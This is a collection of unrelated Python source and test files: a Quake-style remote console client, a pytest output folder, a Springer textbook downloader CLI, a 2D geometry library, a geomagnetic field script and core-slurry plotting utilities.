#### File: PyRcon/PyRcon/QuakeRemoteConsole.py
```python
from socket import socket, AF_INET,SOCK_DGRAM,MSG_WAITALL,MSG_PEEK
from select import select
from .Exceptions import NoResponseError
class BaseRemoteConsole(object):
'''
XXX Needs more docs
'''
_SEQUENCE = 0x00
_CHUNKSZ = 2048
_PREFIX_BYTE = 0xff
_RCON_CMD = 'rcon '
def __init__(self,password,hostname='localhost',port=28960):
'''
:param: password - string password for server
:param: hostname - string, name or IP address of server
:param: port - integer, port number to contact on hostname
'''
self.passwd = password
self.host = hostname
self.port = port
def __repr__(self):
return '<%s(%s,%s,%s)>' % (self.__class__.__name__,
self.passwd,
self.host,
self.port)
@property
def reply_header(self):
'''
Override this property and provide a byte buffer that
is prefixed to data returned by the server.
'''
return ''
@property
def prefix(self):
'''
Bytes values prefixing each command sent to the remote
console. The Quake-style of prefix was four bytes of 0xFF
followed by the string 'rcon'. Later derivitives like
Call of Duty added a sequence byte inbetween the last 0xFF
and the 'rcon' string.
'''
try:
return self._prefix
except AttributeError:
data = [self._PREFIX_BYTE] * 4
try:
data.append(self._SEQUENCE)
except AttributeError:
pass
data.extend(map(ord,self._RCON_CMD))
self._prefix = bytes(data)
return self._prefix
@property
def udp_sock(self):
'''
An (AF_INET,SOCK_DGRAM) socket
'''
try:
return self._udp_sock
except AttributeError:
self._udp_sock = socket(AF_INET,SOCK_DGRAM)
return self._udp_sock
@property
def address(self):
'''
A tuple of (host,port), determines where messages are sent.
'''
return (self.host,self.port)
def send(self,message,encoding,timeout,retries):
'''
:param: message - string holding command to send to server
:param: encoding - string, typically 'utf-8' XXX necessary?
:param: timeout - float seconds to wait for a response
:param: retries - integer number of times to timeout before failing
:return: string server response to client message
Sends 'message' to the server and waits for a response,
which is returned to the caller.
The Quake-style protocol does not have an EOM component, so a
timeout scheme is used to decide when the response is complete.
If no data is received after (timeout * retries) seconds, the
NoResponseError exception is raised which will contain the
message that was not acknowledged and the timeout and retries
used.
'''
data = self.prefix + bytes('%s %s'%(self.passwd,message),encoding)
self.udp_sock.sendto(data,self.address)
tries = 0
chunks = []
while True:
read_ready,_,_ = select([self.udp_sock],[],[],timeout)
if self.udp_sock in read_ready:
data = self.udp_sock.recv(self._CHUNKSZ)
if data.startswith(self.reply_header):
chunks.append(data[len(self.reply_header):])
else:
raise ValueError(data)
else:
tries += 1
if tries > retries:
break
if len(chunks) == 0:
raise NoResponseError(message,timeout,retries)
text = ''.join([chunk.decode() for chunk in chunks])
return text
def clean(self,text,strdefs,emptyString=''):
'''
:param: text - string to be 'cleaned'
:param: strdefs - list of tuples [(start_character,length)..]
:return: string with substrings defined in strdefs removed
Elides strings from the target text that start with
the specified character for the specified length.
'''
if strdefs is None:
strdefs = [ ('^',2), ('"',1) ]
for startToken,slen in strdefs:
if slen == 1:
text = text.replace(startToken,emptyString)
else:
try:
i = text.index(startToken)
text = text.replace(text[i:i+slen],emptyString)
except ValueError:
pass
return text
``` |
{
"source": "JnyJny/pytest-fold",
"score": 3
} |
#### File: pytest-fold/pytest_fold/utils.py
```python
import re
from plugin import MARKERS
foldmark_matcher = re.compile(r".*(~~>PYTEST_FOLD_MARKER_)+(.*)<~~")
fail_begin_end_matcher = re.compile(r"(.+)((_BEGIN)|(_END))")
section_name_matcher = re.compile(r"~~>PYTEST_FOLD_MARKER_(\w+)")
def line_is_a_marker(line: str) -> bool:
if line.strip() == "":
return False
return line.strip() in (
MARKERS["pytest_fold_firstline"],
MARKERS["pytest_fold_errors"],
MARKERS["pytest_fold_failures"],
MARKERS["pytest_fold_failed_test"],
MARKERS["pytest_fold_terminal_summary"],
)
def line_is_lastline(line: str) -> bool:
if line.strip() == "":
return False
return line.strip() in MARKERS["pytest_fold_lastline"]
def sectionize(lines: str) -> dict:
"""
Parse lines from a Pytest run's console output which are marked with Pytest-Fold
markers, and build up a dictionary of ANSI text strings corresponding to individual
sections of the output. This function is meant to be called from the Pytest-Fold
TUI for interactive display.
"""
sections = []
section = {"name": None, "content": ""}
lastline = False
for line in lines:
if line_is_a_marker(line):
sections.append(section.copy()) if section["name"] else None
section["content"] = ""
section["name"] = re.search(section_name_matcher, line).groups()[0]
elif line_is_lastline(line):
lastline = True
sections.append(section.copy())
section["content"] = ""
section["name"] = re.search(section_name_matcher, line).groups()[0]
else:
section["content"] += line
sections.append(section.copy()) if lastline else None
return sections
``` |
{
"source": "JnyJny/springer_downloader",
"score": 2
} |
#### File: springer_downloader/springer/__main__.py
```python
import typer
from loguru import logger
from pathlib import Path
from .constants import FileFormat, Language, Topic, Component
from .catalog import Catalog
cli = typer.Typer()
DOWNLOAD_REPORT = "DOWNLOAD_REPORT.txt"
@cli.callback()
def main(
ctx: typer.Context,
language: Language = typer.Option(
None,
"--language",
"-L",
show_choices=True,
show_default=True,
help="Choose catalog language",
),
topic: Topic = typer.Option(
None,
"--topic",
"-T",
show_default=True,
show_choices=True,
help="Choose a catalog topic.",
),
):
"""
__Springer Textbook Bulk Download Tool__
## NOTICE
The author of this software is not affiliated with Springer and this
tool is not authorized or supported by Springer. Thank you to
Springer for making these high quality textbooks available at no
cost.
\b
>"With the Coronavirus outbreak having an unprecedented impact on
>education, Springer Nature is launching a global program to support
>learning and teaching at higher education institutions
>worldwide. Remote access to educational resources has become
>essential. We want to support lecturers, teachers and students
>during this challenging period and hope that this initiative will go
>some way to help.
>
>Institutions will be able to access more than 500 key textbooks
>across Springer Nature’s eBook subject collections for free. In
>addition, we are making a number of German-language Springer medical
>training books on emergency nursing freely accessible. These books
>will be available via SpringerLink until at least the end of July."
[Source](https://www.springernature.com/gp/librarians/news-events/all-news-articles/industry-news-initiatives/free-access-to-textbooks-for-institutions-affected-by-coronaviru/17855960)
## Overview
This tool automates the process of downloading the Springer-provided
Excel catalogs, locating URLs and downloading the files in PDF or epub
format.
Catalogs are lists of books in a specific _language_, spanning a
_topic_. Catalogs are further subdivided into _packages_ which are
books grouped by sub-topics.
Textbooks can be downloaded by; title, package name or the entire
catalog. Title and package names can be incompletely specified and
are case-insensitive.
The available languages are: English & German.
The available topics are: _All Disciplines_ and _Emergency Nursing_.
**Note: The _Emergency Nursing_ topic is not available in English.**
## Source and License
Full source is available on
[GitHub](https://github.com/JnyJny/springer_downloader) and it is
licensed under the
[Apache-2.0](https://www.apache.org/licenses/LICENSE-2.0)
license.
## Installation
This utility can be installed using `pip`:
`$ python3 -m pip install springer`
Or from the latest source on GitHub:
`$ python3 -m pip install git+https://github.com/JnyJny/springer_downloader`
"""
# EJO The callback function is called before any of the command functions
# are invoked. Since all the subcommands work with an instantiation of
# springer.catalog.Catalog, we create one in the callback and attach it
# to the typer.Context object using the attribute 'obj'. I don't
# particularly care for accessing the catalog as 'ctx.obj' in the
# subcommands, but I haven't found a better solution to this "problem"
# yet.
try:
ctx.obj = Catalog(language, topic)
except KeyError as error:
typer.secho(
f"Failed to locate a catalog for: '{error.args[0].value!s}'", fg="red"
)
raise typer.Exit(-1)
@cli.command(name="get-default-catalog")
def get_default_catalog_subcommand():
"""Print the default catalog identifier.
This is the default catalog that will be used when listing books and packages
and the user has not specified a --language or --topic on the command line.
"""
typer.secho(f"Default: {Catalog(fetch=False)}", fg="green")
@cli.command(name="set-default-catalog")
def set_default_catalog_subcommand(ctx: typer.Context,):
"""Set default catalog language and topic.
__Examples__
Set the default catalog to German language:
`$ springer --language de set-default-catalog`
Set the default catalog to German and emergency nursing:
`$ springer --language de --topic med set-default-catalog`
Set the default catalog to English and all disciplines topic:
`$ springer --language en --topic all set-default-catalog`
Note: The only English language catalog is `en-all`.
"""
prev = Catalog(fetch=False)
ctx.obj.save_defaults()
typer.secho(f"Old Default: {prev!s}", fg="red" if prev.is_default else "blue")
typer.secho(f"New Default: {Catalog(fetch=False)!s}", fg="green")
@cli.command(name="list")
def list_subcommand(
ctx: typer.Context,
component: Component,
name: str = typer.Option(
None, "--name", "-n", help="Name to match against title or pacakge."
),
long_format: bool = typer.Option(
False,
"--long-format",
"-l",
is_flag=True,
show_default=True,
help="Display selected information in a longer format.",
),
):
"""List books, package, packages, catalog or catalogs.
Display information about books, packages, and catalogs. Packages
are sets of books grouped by subject.
__Examples__
List titles available in the default catalog:
`$ springer list books`
List packages available in the default catalog:
`$ springer list packages`
List titles available in the German language, all disciplines catalog:
`$ springer --language de --topic all list books`
List all eBook packages in the default catalog:
`$ springer list packages`
List all eBook packages in the default catalog whose name match:
`$ springer list package -m science`
List information about the current catalog:
`$ springer list catalog`
List information about the Germal language, Emergency Nursing catalog:
`$ springer --language de --topic med list catalog`
"""
if component == Component.Books:
ctx.obj.list_textbooks(long_format, name)
return
if component is Component.Package:
if name:
for pkgname, pkginfo in ctx.obj.packages.items():
if name.casefold() in pkgname.casefold():
ctx.obj.list_package(pkgname, pkginfo, long_format)
return
else:
component = Component.Packages
if component is Component.Packages:
ctx.obj.list_packages(long_format)
return
if component is Component.Catalog:
catalogs = [ctx.obj]
if component is Component.Catalogs:
catalogs = Catalog.all_catalogs()
for catalog in catalogs:
catalog.list_catalog(long_format)
@cli.command(name="refresh-catalog")
def refresh_subcommand(
ctx: typer.Context,
catalog_url: str = typer.Option(
None, "--url", "-u", help="URL for Excel-formatted catalog."
),
all_catalogs: bool = typer.Option(False, "--all", is_flag=True),
):
"""Refresh the cached catalog of springer textbooks.
If `--all` is specified, the `--url` option is ignored.
__Examples__
Update English language catalog:
`$ springer --language en refresh`
Update German language catalog whose topic is 'all':
`$ springer --language de --topic all refresh`
Update German language catalog whose topic is 'med' with a new url:
`$ springer -l de -d med refresh --url https://example.com/api/endpoint/something/v11`
__NOTE: THIS URL DOES NOT REPLACE THE DEFAULT URL FOR THE TARGET CATALOG__
Update all catalogs:
`$ springer refresh-catalog --all`
"""
if not all_catalogs:
ctx.obj.fetch_catalog(catalog_url)
print(ctx.obj)
return
for catalog in Catalog.all_catalogs():
catalog.fetch_catalog()
print(catalog)
@cli.command(name="clean-catalog")
def clean_subcommand(
ctx: typer.Context,
force: bool = typer.Option(False, "--force", "-F", is_flag=True),
all_catalogs: bool = typer.Option(False, "--all", is_flag=True),
):
"""Remove cached catalogs.
__Examples__
Remove the cached default catalog:
`$ springer clean-catalog --force`
Remove the cached German language _Emergency Nursing_ catalog:
`$ springer --language de --topic med clean-catalog --force`
Remove all catalogs:
`$ springer clean-catalog --force --all`
"""
if not force:
typer.secho("The --force switch is required!", fg="red")
raise typer.Exit(-1)
if not all_catalogs:
ctx.obj.cache_file.unlink()
return
for catalog in Catalog.all_catalogs():
catalog.cache_file.unlink()
def _configure_logger(path: Path, logfile: str = None) -> None:
"""Adds `path` / `logfile` to the logger configuration.
Makes sure that the path exists (including parents)
and enables logging to the specified file located in that
directory.
:param path: pathlib.Path
:param logfile: str
"""
logfile = logfile or DOWNLOAD_REPORT
logfmt = "{time:YYYY-MM-DD HH:mm} | <red>{message}</>"
logger.configure(
**{"handlers": [{"sink": path / logfile, "format": logfmt, "colorize": True,},]}
)
@cli.command("download")
def download_subcommand(
ctx: typer.Context,
component: Component,
name: str = typer.Option(
None, "--name", "-n", help="Name to match against title or package."
),
dest_path: Path = typer.Option(
Path.cwd(),
"--dest-path",
"-d",
show_default=True,
help="Destination directory for downloaded files.",
),
file_format: FileFormat = typer.Option(
FileFormat.pdf, "--format", "-f", show_default=True, show_choices=True,
),
overwrite: bool = typer.Option(
False,
"--over-write",
"-W",
is_flag=True,
show_default=True,
help="Over write downloaded files.",
),
):
"""Download textbooks from Springer
This command downloads textbooks from Springer to the local host. Files
are saved by default in PDF format to the current working directory.
If a download is interrupted by the user, it can be later restarted where
the interruption occurred without downloading previous files.
Problems encountered while downloading files are logged to:
`dest-path/DOWNLOAD_REPORT.txt`
__Examples__
Download all books in the default catalog in PDF format to the
current directory:
`$ springer download books`
Download all books in EPUB format whose title includes 'python':
`$ springer download books --name python --format epub`
Download all books into directories grouped by package:
`$ springer download packages --dest-path by_pkgs
Download all books in a specific package in EPUB format:
`$ springer download package --name 'Computer Science' --format epub`
Download all books in packages whose name includes `Science`:
`$ springer download package --name science --dest sciences`
Download all books in all catalogs [en-all, de-all, de-med] in EPUB format:
`$ springer download catalogs --format epub`
The `catalogs` download subcommand will create a set of directories by language
and topic for each catalog and save downloaded files into the appropriate
directory, eg:
\b
- dest-path/English/All_Disciplines/package_name/title.fmt
- dest-path/German/All_Disciplines/package_name/title.fmt
- dest-path/German/Emergency_Nursing/package_name/title.fmt
The `package` and `packages` subcommands will also save downloaded
files into directories with package names rooted in the destination
path:
\b
dest-path/package_name/title.fmt
...
See Also: `set-default-catalog`, `get-default-catalog`, `list`
"""
dest_path = dest_path.resolve()
dest_path.mkdir(mode=0o755, exist_ok=True, parents=True)
_configure_logger(dest_path)
try:
if component in [Component.Books, Component.Catalog]:
if not name:
ctx.obj.download(dest_path, file_format, overwrite)
else:
ctx.obj.download_title(name, dest_path, file_format, overwrite)
return
if component in [Component.Package, Component.Packages]:
if component is Component.Package:
if not name:
typer.secho(f"Please supply a `name` for package", fg="red")
raise typer.Exit(-1)
package_names = [name]
else:
package_names = ctx.obj.packages.keys()
for pkgname in package_names:
path = dest_path / pkgname.replace(" ", "_")
path.mkdir(mode=0o755, exist_ok=True, parents=True)
ctx.obj.download_package(pkgname, path, file_format, overwrite)
return
if component is Component.Catalogs:
for catalog in Catalog.all_catalogs():
path = dest_path / catalog.language.name / catalog.topic.name
path.mkdir(mode=0o755, exist_ok=True, parents=True)
for pkgname in catalog.packages:
path = dest_path / pkgname.replace(" ", "_")
path.mkdir(mode=0o755, exist_ok=True, parents=True)
catalog.download_package(pkgname, path, file_format, overwrite)
except KeyError as error:
typer.secho(str(error), fg="red")
raise typer.Exit(-1) from None
except PermissionError as error:
typer.secho("Permission error for: ", nl=False)
typer.secho(str(error.filename), fg="red")
raise typer.Exit(-1) from None
@cli.command("version")
def version_subcommand(ctx: typer.Context):
from .__version__ import __version__
typer.secho(f"{__version__}", fg="green")
```
#### File: tests/unit/test_catalog.py
```python
import pytest
from pathlib import Path
from pandas import DataFrame
from springer.catalog import Catalog
from springer.constants import Language, Topic
@pytest.fixture(scope="module")
def CATALOG():
return Catalog()
def test_creating_catalog_no_args():
catalog = Catalog()
assert catalog
assert isinstance(catalog, Catalog)
@pytest.mark.parametrize(
"lang,cat",
[
(Language.English, Topic.All_Disciplines),
(Language.German, Topic.All_Disciplines),
(Language.German, Topic.Emergency_Nursing),
],
)
def test_creating_catalog_with_args_xpass(lang, cat):
catalog = Catalog(lang, cat)
assert catalog
assert isinstance(catalog, Catalog)
assert catalog.language == lang
assert catalog.topic == cat
@pytest.mark.parametrize(
"lang,cat", [(Language.English, Topic.Emergency_Nursing),],
)
def test_creating_catalog_with_args_xfail(lang, cat):
with pytest.raises(KeyError):
catalog = Catalog(lang, cat)
@pytest.mark.parametrize(
"prop_name,prop_type",
[
("name", str),
("is_default", bool),
("language", Language),
("topic", Topic),
("url", str),
("config_dir", Path),
("defaults_file", Path),
("defaults", dict),
("cache_file", Path),
("ttable", dict),
("dataframe", DataFrame),
("packages", dict),
],
)
def test_catalog_property_existence_and_type(prop_name, prop_type, CATALOG):
value = getattr(CATALOG, prop_name)
assert isinstance(value, prop_type)
@pytest.mark.parametrize(
"method_name",
[
"__repr__",
"__str__",
"__iter__",
"__eq__",
"all_catalogs",
"content_url",
"save_defaults",
"fetch_catalog",
"textbooks",
"download_textbook",
"download_dataframe",
"download_dataframe_animated",
"download_title",
"download_package",
"download",
"list_dataframe",
"list_textbooks",
"list_package",
"list_packages",
"list_catalog",
],
)
def test_catalog_method_existence(method_name, CATALOG):
method = getattr(CATALOG, method_name)
assert callable(method)
def test_catalog_classmethod_all_catalogs():
for catalog in Catalog.all_catalogs():
assert isinstance(catalog, Catalog)
``` |
{
"source": "JnyJny/twod",
"score": 3
} |
#### File: twod/tests/test_point_add.py
```python
import pytest
from twod import Point
@pytest.mark.parametrize(
"A, B, expected",
[
[[0, 0], [0, 0], (0, 0)],
[[0, 0], [1, 1], (1, 1)],
[[0, 0], [-1, -1], (-1, -1)],
[[1, 1], [-1, -1], (0, 0)],
],
)
def test_point_addition_with_point(A, B, expected):
result = Point(*A) + Point(*B)
assert result == expected
@pytest.mark.parametrize(
"A, scalar, expected",
[
[[0, 0], -1, [-1, -1]],
[[1, 1], -1, [0, 0]],
[[0, 0], 1, [1, 1]],
[[1, 1], 1, [2, 2]],
[[0, 0], 0, [0, 0]],
[[1, 1], 0, [1, 1]],
[[0, 0], -1.0, [-1, -1]],
[[1, 1], -1.0, [0, 0]],
[[0, 0], 1.0, [1, 1]],
[[1, 1], 1.0, [2, 2]],
[[0, 0], 0.0, [0, 0]],
[[1, 1], 0.0, [1, 1]],
],
)
def test_point_addition_with_scalar(A, scalar, expected):
result = Point(*A) + scalar
assert result == expected
@pytest.mark.parametrize(
"A, iterable, expected",
[
[(0, 0), [1, 1], (1, 1)],
[(0, 0), (2, 2), (2, 2)],
[(0, 0), [3, 2, 1], (3, 2)],
],
)
def test_point_addition_with_iterable(A, iterable, expected):
result = Point(*A) + iterable
assert result == expected
```
#### File: twod/tests/test_point_iadd.py
```python
import pytest
from twod import Point
@pytest.mark.parametrize(
"A, B, expected",
[
[[0, 0], [0, 0], (0, 0)],
[[1, 2], [2, 3], [3, 5]],
],
)
def test_point_inplace_addition_with_point(A, B, expected):
p = Point(*A)
p += Point(*B)
assert p == expected
@pytest.mark.parametrize(
"A, iterable, expected",
[
[(0, 0), [1, 1], (1, 1)],
[(0, 0), (2, 2), (2, 2)],
[(0, 0), [3, 2, 1], (3, 2)],
],
)
def test_point_inplace_addition_with_iterable(A, iterable, expected):
r = Point(*A)
r += iterable
assert r == expected
@pytest.mark.parametrize(
"A, scalar, expected",
[
[[0, 0], 1, [1, 1]],
],
)
def test_point_inplace_addition_with_scalar(A, scalar, expected):
p = Point(*A)
p += scalar
assert p == expected
```
#### File: twod/twod/rect.py
```python
from dataclasses import astuple, dataclass
from .point import Point
from typing import Any
from typing import Dict
from typing import List
@dataclass
class Rect(Point):
"""A rectangle specified by an origin at (x,y) and
dimensions (w,h).
"""
w: int = 0
h: int = 0
@property
def A(self) -> Point:
"""Point at (x,y)."""
return Point(self.x, self.y)
@property
def B(self) -> Point:
"""Point at (x+w, y)."""
return Point(self.x + self.w, self.y)
@property
def C(self) -> Point:
"""Point at (x+w, y+h)."""
return Point(self.x + self.w, self.y + self.h)
@property
def D(self) -> Point:
"""Point at (x, y+h)."""
return Point(self.x, self.y + self.h)
@property
def vertices(self) -> List[Point]:
"""The points A, B, C, and D in a list.
"""
return [self.A, self.B, self.C, self.D]
@property
def sides(self) -> List[float]:
"""The lengths of each side: AB, BC, CD, and DA.
"""
return [
max(abs(self.A - self.B)),
max(abs(self.B - self.C)),
max(abs(self.C - self.D)),
max(abs(self.D - self.A)),
]
@property
def center(self) -> Point:
"""Point at the center of the rectangle (midpoint of AC).
"""
return self.A.midpoint(self.C)
@center.setter
def center(self, new_center):
self.x, self.y = Point(*new_center) - (Point(self.w, self.h) / 2)
@property
def perimeter(self) -> float:
"""The distance around this rectangle.
"""
return sum(self.sides)
@property
def area(self) -> float:
"""The area of this rectangle.
"""
return self.w * self.h
def __contains__(self, other) -> bool:
"""If other is a twod.Point, returns True if the point is inside this
rectangle.
If other is a twod.Rect, returns True if any of other's vertices are
inside or any of the target rectangle's verices are inside other.
Otherwise returns False.
Raises TypeError if other is not a Point or Rect.
"""
if not isinstance(other, Rect):
try:
return other.between(self.A, self.C)
except AttributeError:
pass
raise TypeError(f"expected Point or Rect, received {type(other)}")
for v in other.vertices:
if v.between(self.A, self.C):
return True
for v in self.vertices:
if v.between(other.A, other.C):
return True
return False
def __add__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
x = self.x + other.x
y = self.y + other.y
try:
w = self.w + other.w
h = self.h + other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
def __iadd__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
self.x += other.x
self.y += other.y
try:
self.w += other.w
self.h += other.h
except AttributeError:
pass
return self
def __sub__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
x = self.x - other.x
y = self.y - other.y
try:
w = self.w - other.w
h = self.h - other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
def __isub__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
self.x -= other.x
self.y -= other.y
try:
self.w -= other.w
self.h -= other.h
except AttributeError:
pass
return self
def __mul__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
x = self.x * other.x
y = self.y * other.y
try:
w = self.w * other.w
h = self.h * other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
def __imul__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
self.x *= other.x
self.y *= other.y
try:
self.w *= other.w
self.h *= other.h
except AttributeError:
pass
return self
def __truediv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
x = self.x / other.x
y = self.y / other.y
try:
w = self.w / other.w
h = self.h / other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
def __itruediv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
self.x /= other.x
self.y /= other.y
try:
self.w /= other.w
self.h /= other.h
except AttributeError:
pass
return self
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
def __floordiv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
x = self.x // other.x
y = self.y // other.y
try:
w = self.w // other.w
h = self.h // other.h
except AttributeError:
w = self.w
h = self.h
return Rect(x, y, w, h)
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
def __ifloordiv__(self, other):
"""
:param Point|Rect other:
:return: Rect
"""
try:
self.x //= other.x
self.y //= other.y
try:
self.w //= other.w
self.h //= other.h
except AttributeError:
pass
return self
except ZeroDivisionError:
pass
raise ZeroDivisionError(other)
``` |
{
"source": "jnywong/chaos",
"score": 2
} |
#### File: jnywong/chaos/script.py
```python
import chaosmagpy
import shtns
import pyshtools as pysh
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
from paropy.plot_utils import rad_to_deg, get_Z_lim
import scipy.special as sp
import numpy as np
lmax = 20
nphi = 480
ntheta = 200
fig_aspect = 0.8
n_levels = 30
def get_grid(nphi=256, ntheta=128):
phi = np.linspace(0., 2*np.pi, nphi)
x, w = sp.roots_legendre(ntheta)
theta = np.sort(np.arccos(x))
p2D = np.zeros([nphi, ntheta])
th2D = np.zeros([nphi, ntheta])
for i in range(nphi):
p2D[i, :] = phi[i]
for j in range(ntheta):
th2D[:, j] = theta[j]
return p2D, th2D
# Load CHAOS data
model = chaosmagpy.load_CHAOS_matfile('CHAOS-7.7.mat')
time = 2020.
timeCHAOS = chaosmagpy.data_utils.dyear_to_mjd(time)
# Gauss, max. degree 20
# g10, g11, h11, g20, g21, h21, g22, h22
ylm = model.synth_coeffs_tdep(timeCHAOS)
dtglm = model.synth_coeffs_tdep(timeCHAOS,deriv=1) # Secular Variation
mmax = lmax
sh = shtns.sht(lmax, mmax)
nlat, nphi = sh.set_grid(nlat = ntheta, nphi = nphi)
# Construct complex Gauss coefficients
k=0
j=0
m=0
glm = np.zeros(int(lmax*(lmax+3)/2))
hlm = np.zeros(int(lmax*(lmax+3)/2))
for l in range(1,lmax+1):
for i in range(2*l+1):
if i==0:
glm[j] = ylm[k]
hlm[j]= 0.0
j +=1
m+=1
else:
if np.mod(i,2) == 1:
glm[j] = ylm[k]
j+=1
else:
hlm[m] = ylm[k]
m+=1
k+=1
# Set g00 = 0 (no monopoles)
glm = np.insert(glm,0,0)
hlm = np.insert(hlm, 0, 0)*1j
Ylm = np.zeros(int(lmax*(lmax+3)/2+1),dtype=np.cdouble)
Ylm = glm + hlm
X,Y = get_grid(nphi=nphi, ntheta = ntheta)
Br = np.zeros_like(X)
cilm = pysh.shio.SHCindexToCilm(Ylm)
clm = pysh.SHCoeffs.from_array(cilm, normalization='ortho',csphase=-1)
# Z = sh.synth(Ylm)
Z = Br
w, h = plt.figaspect(fig_aspect)
fig, ax = plt.subplots(1, 1, figsize=(1.5*w, h),
subplot_kw={'projection': ccrs.Mollweide()})
# phi = np.linspace(0,2*np.pi,nphi)
# theta = np.linspace(0, np.pi, ntheta)
# X, Y = rad_to_deg(phi, theta)
# Z_lim = get_Z_lim(Z)
Z_lim = 20000
levels = np.linspace(-Z_lim, Z_lim, n_levels)
c = ax.contourf(X, Y, Z, levels, transform=ccrs.PlateCarree(), cmap='PuOr_r',
extend='both')
fig.show()
``` |
{
"source": "jnywong/nondim-slurry",
"score": 2
} |
#### File: nondim-slurry/slurpy/plot_utils.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
from matplotlib import cm
import pickle
import os
import matplotlib as mpl
mpl.rcParams['text.usetex'] = False
import matplotlib.gridspec as gridspec
from slurpy.data_utils import readdata, get_outputDir
from slurpy.getparameters import getcsbmassoxygen, getKphi, getphi
from slurpy.coreproperties import icb_radius, earth_radius, aO, density_solidFe
from slurpy.lookup import premdensity, liquidus, premvp, ak135radius, ak135vp
# %%
def plot_profile(inputDir):
# Read data
try:
# print(inputDir)
inputs,outputs,profiles = readdata(inputDir)
except:
print('Folder does not exist')
# print('State = {}'.format(outputs.state.iloc[0]))
# Plots
csb_radius = pd.to_numeric(profiles.r.iloc[-1])
radius=(profiles.r)*1e-3
w, h = plt.figaspect(0.75)*2
# Temperature
fig1=plt.figure
fig1, ((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2,sharex=True,figsize=(w,h))
ax1.plot(radius,profiles.temp)
ax1.set(ylabel="Temperature (K)")
# Oxygen
(mass_conc_O,acore) =getcsbmassoxygen(inputs.oxygen_bulk)
acore=float(acore)
ax2.plot(radius,profiles.oxygen*acore/aO*100)
ax2.set(ylabel="Oxygen (mol.%)")
ax3.plot(radius,profiles.solidflux)
ax3.set(xlabel="Radius (km)",ylabel="Solid flux ($\mathrm{kg m^{-2} s^{-1}}$)")
# Density
ax4.plot(radius,profiles.density)
ax4.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
# Liquidus
radius_liquidus=np.linspace(icb_radius,csb_radius)
temp_liquidus=liquidus(radius_liquidus)
ax1.plot(radius_liquidus*1e-3,temp_liquidus,'k--', label = 'Liquidus (Davies et al. 2015)')
ax1.legend()
# Seismology
radius_prem=np.linspace(icb_radius,csb_radius)
density_prem=premdensity(radius_prem)
ax4.plot(radius_prem*1e-3,density_prem,'k--')
ax4.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
ax1.set(ylabel="Temperature (K)")
ax2.set(ylabel="Oxygen (mol.%)")
ax3.set(xlabel="Radius (km)",ylabel="Solid flux ($\mathrm{kg m^{-2} s^{-1}}$)")
ax1.set_xlim([radius.iloc[0],radius.iloc[-1]])
plt.tight_layout()
plt.show()
# %%
def plot_sensitivity(csb_temp,csb_oxygen,csb_temp0,csb_oxy0,saveOn,aspectRatio=0.75):
w, h = plt.figaspect(aspectRatio)
fig1, (ax1,ax2) = plt.subplots(1,2,figsize=(2*w,h),sharey=True)
# Temperature
nTemp = csb_temp.size
colors=plt.cm.OrRd(np.linspace(0.4,1,nTemp))
den_jump=[]
for i in range(nTemp):
filename = 'sensitivity/temp_{:.0f}'.format(csb_temp[i]).replace('.','_')
with open(filename, 'rb') as f:
(radius,temp,xi,solidFlux,density)=pickle.load(f)
if i ==0 or i == nTemp-1:
ax1.plot(radius*1e-3,density,color=colors[i], linewidth = 2,
label =r'$T^{{sl}}=${:.0f} K'.format(csb_temp[i]))
# Reference case
elif csb_temp[i]==csb_temp0:
den_jump0 = density[0]-density[-1]
ax1.plot(radius*1e-3,density,color='silver', linewidth = 2,
label=r'$T^\mathregular{{sl}}=$5457 K')
else:
ax1.plot(radius*1e-3,density,color=colors[i])
den_jump.append(density[0]-density[-1])
# PREM
density_prem=premdensity(radius)
ax1.plot(radius*1e-3,density_prem, 'k', linestyle = '--')
ax1.legend(fontsize=11.5)
ax1.set_xlim([radius[0]*1e-3,radius[-1]*1e-3])
ax1.set(xlabel="Radius (km)",ylabel="Density ($\mathrm{kg m^{-3}}$)")
den_low = (den_jump[0]-den_jump0)/den_jump0*100
den_high = (den_jump[-1]-den_jump0)/den_jump0*100
print('Temperature: Density jump ranges from {:.2f}% to {:.2f}% of reference'.format(den_low, den_high))
# Oxygen
nOxy = csb_oxygen.size
colors=plt.cm.GnBu(np.linspace(0.4,1,nOxy))
den_jump=[]
for i in range(nOxy):
filename = 'sensitivity/oxy_{:.1f}'.format(csb_oxygen[i]).replace('.','_')
with open(filename, 'rb') as f:
(radius,temp,xi,solidFlux,density)=pickle.load(f)
if i ==0 or i == nOxy-1:
ax2.plot(radius*1e-3,density,color=colors[i], linewidth = 2,
label =r'$\xi^{{sl}}=${:.1f} mol.%'.format(csb_oxygen[i]))
# Reference case
elif csb_oxygen[i]==csb_oxy0:
den_jump0 = density[0]-density[-1]
ax2.plot(radius*1e-3,density,color='silver', linewidth = 2,
label=r'$\xi^{{sl}}=$8.0 mol.%')
else:
ax2.plot(radius*1e-3,density,color=colors[i])
den_jump.append(density[0]-density[-1])
# PREM
density_prem=premdensity(radius)
ax2.plot(radius*1e-3,density_prem, 'k', linestyle = '--', label = r'PREM')
ax2.legend(fontsize=11.5)
ax2.set_xlim([radius[0]*1e-3,radius[-1]*1e-3])
ax2.set(xlabel="Radius (km)")
den_low = (den_jump[0]-den_jump0)/den_jump0*100
den_high = (den_jump[-1]-den_jump0)/den_jump0*100
print('Oxygen: Density jump ranges from {:.2f}% to {:.2f}% of reference'.format(den_low, den_high))
